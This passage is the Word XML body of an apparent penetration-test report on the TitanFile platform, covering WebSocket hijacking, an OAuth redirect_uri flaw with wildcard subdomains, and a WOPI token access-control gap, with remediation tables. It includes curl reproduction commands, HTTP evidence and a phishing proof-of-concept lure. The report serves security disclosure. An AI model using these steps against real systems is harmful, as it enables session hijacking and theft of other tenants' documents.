            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Requires valid session cookie or auth token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Issues SID to any requester without authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cross-origin WebSocket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Blocked via origin checking or token requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AWSALBTGCORS cookie (SameSite=None) sent cross-origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Permission updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Server validates authorized admin source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>permissionsChanged() blindly overwrites from any socket data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>User config updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Whitelist of modifiable attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>updateUserConfigs() iterates and sets ALL keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitability: HIGH — Victim only needs to visit attacker's page while logged in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Impact: CRITICAL — Privilege escalation to admin, data exfiltration via 85+ socket events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Affected Population: All authenticated TitanFile users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Complexity: LOW — Standard CSWSH attack, well-documented technique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Privileges Required: NONE — Attacker needs no TitanFile account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>User Interaction: REQUIRED — Victim must visit attacker's page</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Require valid session authentication before issuing Socket.IO session IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Add origin validation on WebSocket upgrade requests (whitelist app.titanfile.com)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</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Server-side validation in permissions:update_perm_cache — only accept from authorized admin connections</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Set SameSite=Lax minimum on AWSALBTGCORS cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium-term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implement token-based WebSocket authentication (CSRF token in handshake query)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-306: Missing Authentication for Critical Function — https://cwe.mitre.org/data/definitions/306.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-1275: Sensitive Cookie with Improper SameSite — https://cwe.mitre.org/data/definitions/1275.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP WebSocket Security Testing — https://owasp.org/www-project-web-security-testing-guide/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Cross-Site WebSocket Hijacking (Christian Schneider) — https://christian-schneider.net/CrossSiteWebSocketHijacking.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VULN-003: Google OAuth2 Authorization Code Theft via Dynamic redirect_uri and Wildcard DNS</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CRITICAL</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8.2 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)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CWE-601 (URL Redirection to Untrusted Site), CWE-346 (Origin Validation Error)</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A07:2021 — Identification and Authentication Failures</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https://*.titanfile.com/login/google-oauth2/</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Google OAuth2 integration (Django Social Auth)</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TitanFile's Google OAuth2 integration dynamically generates the redirect_uri parameter based on the subdomain used to initiate the authentication flow. Since *.titanfile.com resolves via wildcard DNS to the same server, an attacker can initiate OAuth flows with arbitrary subdomains, causing Google to redirect the authorization code to an attacker-influenced endpoint. Google OAuth Client ID: 282142653715-fblvrf56cefn2seq8vkuoec4qq11990o.apps.googleusercontent.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Confidentiality: HIGH — OAuth authorization codes can be intercepted, enabling session hijack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Integrity: HIGH — Attacker can authenticate as victim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Phishing Amplification: HIGH — Legitimate titanfile.com domain bypasses user suspicion and email filters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>When a user initiates Google OAuth2 login, the server constructs the authorization URL with a redirect_uri matching the current subdomain. This was tested with three different subdomains:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>app.titanfile.com           → redirect_uri=https://app.titanfile.com/complete/google-oauth2/</w:t>
        <w:br/>
        <w:t>evil-attacker.titanfile.com  → redirect_uri=https://evil-attacker.titanfile.com/complete/google-oauth2/</w:t>
        <w:br/>
        <w:t>secure-login.titanfile.com   → redirect_uri=https://secure-login.titanfile.com/complete/google-oauth2/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The redirect_uri changes dynamically in all cases, confirming no server-side subdomain validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Step-by-Step Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:t>Baseline OAuth flow from legitimate subdomain:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -sI "https://app.titanfile.com/login/google-oauth2/" | grep location</w:t>
        <w:br/>
        <w:t>location: https://accounts.google.com/o/oauth2/auth?...redirect_uri=https://app.titanfile.com/complete/google-oauth2/...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:t>OAuth flow from attacker-controlled subdomain:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -sI "https://evil-attacker.titanfile.com/login/google-oauth2/" | grep location</w:t>
        <w:br/>
        <w:t>location: https://accounts.google.com/o/oauth2/auth?...redirect_uri=https://evil-attacker.titanfile.com/complete/google-oauth2/...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r>
        <w:t>OAuth flow from phishing-optimized subdomain:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="555555"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>$ curl -sI "https://secure-login.titanfile.com/login/google-oauth2/" | grep location</w:t>
        <w:br/>
        <w:t>location: https://accounts.google.com/o/oauth2/auth?...redirect_uri=https://secure-login.titanfile.com/complete/google-oauth2/...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Phishing attack scenario:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>1. Attacker sends phishing email:</w:t>
        <w:br/>
        <w:t xml:space="preserve">   "Your TitanFile document requires re-authentication.</w:t>
        <w:br/>
        <w:t xml:space="preserve">    Click here: https://secure-login.titanfile.com/login/google-oauth2/"</w:t>
        <w:br/>
        <w:br/>
        <w:t>2. Victim clicks → redirected to legitimate Google OAuth consent screen</w:t>
        <w:br/>
        <w:br/>
        <w:t>3. Google redirects to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">   https://secure-login.titanfile.com/complete/google-oauth2/?code=AUTH_CODE</w:t>
        <w:br/>
        <w:br/>
        <w:t>4. If Google OAuth app accepts *.titanfile.com redirect URIs:</w:t>
        <w:br/>
        <w:t xml:space="preserve">   → Attacker captures auth code via XSS on any subdomain</w:t>
        <w:br/>
        <w:t xml:space="preserve">   → Attacker replays authorization code for victim's session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>CODE:GET /login/google-oauth2/ HTTP/2</w:t>
        <w:br/>
        <w:t>Host: evil-attacker.titanfile.com</w:t>
        <w:br/>
        <w:br/>
        <w:t>HTTP/2 302</w:t>
        <w:br/>
        <w:t>location: https://accounts.google.com/o/oauth2/auth?</w:t>
        <w:br/>
        <w:t xml:space="preserve">  client_id=282142653715-fblvrf56cefn2seq8vkuoec4qq11990o.apps.googleusercontent.com</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &amp;redirect_uri=https://evil-attacker.titanfile.com/complete/google-oauth2/</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &amp;state=dUxnHsKurVdoZUdJnwv7RwU2RnjKpYJf</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &amp;response_type=code</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &amp;scope=openid+email+profile</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redirect_uri</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fixed to https://app.titanfile.com/complete/google-oauth2/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Dynamically generated from the requesting subdomain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Subdomain validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Only known tenant subdomains accepted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Any arbitrary subdomain works (*.titanfile.com wildcard DNS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Risk Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitability: HIGH — Simple phishing link with legitimate domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Impact: HIGH — OAuth code interception enables session hijack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Complexity: LOW — No special conditions required</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Hardcode redirect_uri to https://app.titanfile.com/complete/google-oauth2/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Immediate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>In Google Cloud Console, register only specific redirect URIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Low</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Validate Host header against whitelist of known tenant subdomains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium-term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Eliminate wildcard DNS or implement subdomain validation at load balancer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-601: URL Redirection to Untrusted Site — https://cwe.mitre.org/data/definitions/601.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>OAuth 2.0 Security Best Current Practice (RFC 9700)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP OAuth 2.0 Attacks and Countermeasures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>VULN-004: IDOR in WOPI File Access Token Issuance Leading to Cross-Tenant Document Access</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8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)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CWE-639 (Authorization Bypass Through User-Controlled Key)</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A01:2021 — Broken Access Control</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https://app.titanfile.com/static/js/ms365/host-action-dialog.tsx</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MS365 WOPI integration, getAccessToken() API</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MS365 integration component extracts file UUIDs directly from URL query parameters and passes them to the getAccessToken() API without visible client-side ownership validation. If the server does not independently verify that the requesting user has access to the specified file, any authenticated user could obtain WOPI access tokens for any file in the system, enabling unauthorized viewing and editing of documents across organizational boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Confidentiality: HIGH — Unauthorized access to any document in the system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Integrity: HIGH — WOPI tokens may grant edit permissions (can_edit: true)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Data at Risk: Confidential legal, financial, and government documents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Technical Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>In ms365/host-action-dialog.tsx, the component parses the URL to extract a file UUID and requests an access token:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>// ms365/host-action-dialog.tsx (Lines 105-112)</w:t>
        <w:br/>
        <w:t>const matches = queryParams.match(/(edit|view)=([^&amp;]+)&amp;?/);</w:t>
        <w:br/>
        <w:t>const _action: string = matches[1];</w:t>
        <w:br/>
